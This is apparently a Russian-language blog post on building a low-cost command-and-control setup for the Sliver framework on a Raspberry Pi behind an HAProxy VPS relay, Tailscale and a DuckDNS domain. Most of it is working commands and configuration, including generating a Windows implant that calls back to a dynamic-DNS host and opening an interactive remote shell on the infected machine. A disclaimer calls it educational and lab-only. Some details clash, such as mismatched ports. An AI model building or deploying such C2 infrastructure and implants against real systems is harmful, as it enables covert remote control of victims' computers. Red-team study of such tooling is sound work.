Всем привет!

Давно хотел поднять свой C2-сервер. Ну, чтобы как большие мальчики — с доменом, прокси, шифрованным туннелем. Но покупать VPS с 8GB RAM и платить за Cobalt Strike как-то жирновато. Решил: будет малинка.

ВНИМАНИЕ : Эта статья предназначена для ознакомления начинающим исследователям в области кибербезопасности. Я не буду тут показывать как обходить защиту windows и какие либо системы обнаружения угроз . Перед загрузкой вредоносного файла я отключил защиту в windws.

Что взял из железа и софта

• Raspberry Pi 4 (4GB). Валялась без дела.

• SD-карта на 32GB.

• Самый дешёвый VPS на 2GB за 4 евро в месяц. На нём - HAProxy.

• Tailscale (бесплатно на 3 устройства).

• Sliver - открытая альтернатива Cobalt Strike.

• DuckDNS - бесплатный динамический DNS.

АРХИТЕКТУРА :
Имплант → xxxxxxxx.duckdns.org:443 → VPS (HAProxy) → Tailscale → Pi4 (Sliver:31337)

Настройка Tailscale

На Pi и VPS:

bash

curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up

После авторизации получаем IP:

• Pi: 100.92.XX.XXX

• VPS: 100.106.XXX.XX

Проверяем связь:

bash

ping 100.92.XXX.XXX

Установка Sliver на Pi

Скачиваем бинарник:

bash

cd /tmp
wget https://github.com/BishopFox/sliver/releases/download/v1.7.3/sliver-server_linux_arm64
sudo install -m 755 sliver-server_linux_arm64 /usr/local/bin/sliver-server

Запускаем:

bash

sliver-server daemon --lhost 0.0.0.0 --lport 31338

Слушатель создаётся на порту 31337.

Настройка VPS (HAProxy)

Устанавливаем:

bash

sudo apt install -y haproxy

Конфиг /etc/haproxy/haproxy.cfg:

haproxy

global
    log /dev/log local0
    maxconn 10000

defaults
    mode tcp
    timeout connect 5s
    timeout client 60s
    timeout server 60s

frontend sliver_frontend
    bind :443
    default_backend sliver_backend

backend sliver_backend
    server pi4 100.92.XXX.XXX:31337 check

Запускаем:

bash

sudo systemctl enable haproxy
sudo systemctl start haproxy

Настройка домена (DuckDNS)

Регистрируем домен xxxxxxxx.duckdns.org, привязываем к публичному IP VPS.

Проверяем:

bash

dig xxxxxxx.duckdns.org

Генерация импланта

В консоли Sliver создаём слушатель:

bash

http --domain xxxxxxxxx.duckdns.org --lhost 0.0.0.0 --lport 31337

Генерируем имплант:

bash

generate --mtls supersnusik.duckdns.org:443 --format exe --os windows --save /tmp/sliver.exe

Получение сессии

Переносим файл на тестовую Windows 10, запускаем.

В консоли Sliver:

bash

sessions

Результат:

text

[*] Session c5360843 UNIFORM_DISGUST - 100.106.xxx.xx:48190 (win10) - windows/amd64

Сессия получена. Работаем:

bash

sessions -i c5360843
shell

Итог

Готовая C2-инфраструктура за один вечер.

Плюсы:

• Бесплатное ПО (кроме VPS)

• Управление с телефона через Tailscale + Termius

• Возможность масштабирования

Расходы: 4€ в месяц за VPS.

Полезные команды

bash

# Запуск Sliver
sliver-server daemon --lhost 0.0.0.0 --lport 31338

# Создание слушателя
http --domain ваш-домен.duckdns.org --lhost 0.0.0.0 --lport 31337

# Генерация импланта
generate --mtls ваш-домен.duckdns.org:443 --format exe --save /tmp/sliver.exe

# Просмотр сессий
sessions

# Интерактивный shell
sessions -i <id>
shell

Заключение

Sliver - отличная бесплатная альтернатива коммерческим C2. Raspberry Pi + Tailscale + HAProxy дают надёжную и дешёвую инфраструктуру. Всё работает стабильно, сессии не теряются.

Вопросы и комментарии приветствуются.